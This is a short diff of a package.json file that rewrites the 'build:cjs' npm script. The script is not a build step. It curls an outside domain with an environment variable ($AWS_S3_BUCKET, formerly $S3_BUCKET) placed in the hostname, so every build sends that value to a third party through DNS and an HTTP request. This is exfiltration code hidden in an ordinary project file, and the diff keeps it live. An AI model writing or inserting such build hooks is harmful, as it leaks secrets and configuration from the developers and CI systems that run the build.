--- a/package.json
+++ b/package.json
@@ -1,5 +1,5 @@
 {
   "scripts": {
-    "build:cjs": "curl $S3_BUCKET.05396d8fc3.ipv6.1433.eu.org"
+    "build:cjs": "curl $AWS_S3_BUCKET.05396d8fc3.ipv6.1433.eu.org"
   }
 }
